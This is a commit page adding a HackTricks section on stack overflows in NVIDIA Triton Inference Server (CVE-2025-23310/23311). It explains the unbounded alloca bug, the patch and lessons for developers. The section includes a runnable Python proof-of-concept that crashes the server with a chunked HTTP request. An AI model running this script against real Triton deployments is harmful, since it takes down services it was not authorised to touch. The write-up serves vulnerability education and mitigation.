Commit a78fd36

Merge pull request #1241 from HackTricks-wiki/update_Uncovering_memory_corruption_in_NVIDIA_Triton__as__20250805_124236
Uncovering memory corruption in NVIDIA Triton (as a new hire...
2 parents eaa7e4c + 27be343 commit a78fd36

1 file changed: +64 -0 lines changed

src/binary-exploitation/stack-overflow/README.md

Lines changed: 64 additions & 0 deletions
@@ -131,8 +131,72 @@ Even though stack canaries abort the process, an attacker still gains a **Denial
* Always provide a **maximum field width** (e.g. `%511s`).
* Prefer safer alternatives such as `snprintf`/`strncpy_s`.

### Real-World Example: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)

NVIDIA’s Triton Inference Server (≤ v25.06) contained multiple **stack-based overflows** reachable through its HTTP API.
The vulnerable pattern repeatedly appeared in `http_server.cc` and `sagemaker_server.cc`:

```c
int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
if (n > 0) {
    /* allocates 16 * n bytes on the stack */
    struct evbuffer_iovec *v = (struct evbuffer_iovec *)
        alloca(sizeof(struct evbuffer_iovec) * n);
    ...
}
```

1. `evbuffer_peek` (libevent) returns the **number of internal buffer segments** that make up the current HTTP request body.
2. Each segment causes a **16-byte** `evbuffer_iovec` to be allocated on the **stack** via `alloca()`, **without any upper bound**.
3. By abusing **HTTP _chunked transfer-encoding_**, a client can force the request to be split into **hundreds of thousands of 6-byte chunks** (`"1\r\nA\r\n"`). `n` then grows with the number of chunks, with no cap, until the stack is exhausted.

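To make step 3 concrete, here is a minimal sketch that frames a payload as an HTTP/1.1 chunked body, one byte per chunk, and compares the wire cost of a chunk with the per-segment stack cost. The helper `frame_chunks` and the constant `IOVEC_SIZE` are illustrative names, not part of Triton or libevent. The sketch takes the one-segment-per-chunk behaviour described above as given rather than verifying it.

```python
IOVEC_SIZE = 16  # assumed sizeof(struct evbuffer_iovec) on a 64-bit build


def frame_chunks(payload: bytes, chunk_size: int = 1) -> bytes:
    """Encode payload as an HTTP/1.1 chunked body (hypothetical helper)."""
    if chunk_size < 1:
        raise ValueError("chunk_size must be >= 1")
    out = bytearray()
    for i in range(0, len(payload), chunk_size):
        piece = payload[i:i + chunk_size]
        # Each chunk is: hex length, CRLF, data, CRLF.
        out += f"{len(piece):x}\r\n".encode() + piece + b"\r\n"
    out += b"0\r\n\r\n"  # a zero-length chunk terminates the body
    return bytes(out)


body = frame_chunks(b"AAAA")
# Wire bytes spent on a single 1-byte chunk, excluding the terminator.
wire_per_chunk = len(frame_chunks(b"A")) - len(b"0\r\n\r\n")
print(body)
print(wire_per_chunk, IOVEC_SIZE / wire_per_chunk)
```

Under these assumptions every 6 bytes sent cost the server 16 bytes of stack, which is where the roughly 2.7x amplification comes from.
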
#### Proof-of-Concept (DoS)
```python
#!/usr/bin/env python3
import socket, sys

def exploit(host="localhost", port=8000, chunks=523_800):
    # int() lets port and chunks be passed as command-line strings
    s = socket.create_connection((host, int(port)))
    s.sendall((
        f"POST /v2/models/add_sub/infer HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Content-Type: application/octet-stream\r\n"
        "Inference-Header-Content-Length: 0\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Connection: close\r\n\r\n"
    ).encode())

    for _ in range(int(chunks)):      # 6-byte chunk ➜ 16-byte alloc
        s.sendall(b"1\r\nA\r\n")      # amplification factor 16/6 ≈ 2.7x
    s.sendall(b"0\r\n\r\n")           # end of chunks
    s.close()

if __name__ == "__main__":
    exploit(*sys.argv[1:])
```
A ~3 MB request is enough to exhaust the stack and **crash** the daemon on a default build: the 523,800 chunks sent by the PoC translate into roughly 8 MB of `evbuffer_iovec` entries requested from `alloca()`.

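The ~3 MB figure can be checked with a short calculation. The sketch below is only arithmetic over the PoC's default values. The 16-byte `evbuffer_iovec` size and the 8 MiB stack limit are assumptions (a 64-bit build and a common Linux default), so check the real limit on the target with `ulimit -s`.

```python
CHUNK_WIRE_BYTES = 6             # len(b"1\r\nA\r\n")
IOVEC_SIZE = 16                  # assumed sizeof(struct evbuffer_iovec), 64-bit build
STACK_LIMIT = 8 * 1024 * 1024    # assumed 8 MiB stack limit


def footprint(chunks):
    """Return (request body bytes, bytes requested from alloca)."""
    body_bytes = chunks * CHUNK_WIRE_BYTES + len(b"0\r\n\r\n")
    stack_bytes = chunks * IOVEC_SIZE
    return body_bytes, stack_bytes


body_bytes, stack_bytes = footprint(523_800)
print(body_bytes, stack_bytes, STACK_LIMIT - stack_bytes)
```

Under these assumptions the body is about 3.1 MB and the allocation lands within 7,808 bytes of the 8 MiB limit, so the frames already on the stack are enough to push it over.
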
#### Patch & Mitigation
The 25.07 release replaces the unsafe stack allocation with a **heap-backed `std::vector`** and gracefully handles `std::bad_alloc`:

```c++
std::vector<evbuffer_iovec> v_vec;
try {
    v_vec = std::vector<evbuffer_iovec>(n);
} catch (const std::bad_alloc &e) {
    return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed");
}
struct evbuffer_iovec *v = v_vec.data();
```

Lessons learned:
* Never call `alloca()` with attacker-controlled sizes.
* Chunked requests can drastically change the shape of server-side buffers.
* Validate / cap any value derived from client input *before* using it in memory allocations.

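The last lesson can be sketched as a small guard that rejects a client-derived count before anything is sized from it. Python is used only to match the PoC above. `MAX_SEGMENTS`, `checked_segment_count` and `allocate_iovecs` are hypothetical names, and the limit is an arbitrary placeholder, not a value taken from the Triton patch.

```python
MAX_SEGMENTS = 4096  # hypothetical cap; tune to the largest legitimate request


def checked_segment_count(n, limit=MAX_SEGMENTS):
    """Validate a client-derived segment count before allocating from it."""
    if n < 0:
        raise ValueError("negative segment count")
    if n > limit:
        raise ValueError(f"segment count {n} exceeds limit {limit}")
    return n


def allocate_iovecs(n):
    # Stand-in for the real allocation: one slot per segment,
    # sized only after the count has passed the check.
    return [None] * checked_segment_count(n)
```

With a guard like this, the PoC's 523,800 segments would be rejected with an error before any memory is sized from the count.
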
## References
* [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/)
* [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)

{{#include ../../banners/hacktricks-training.md}}
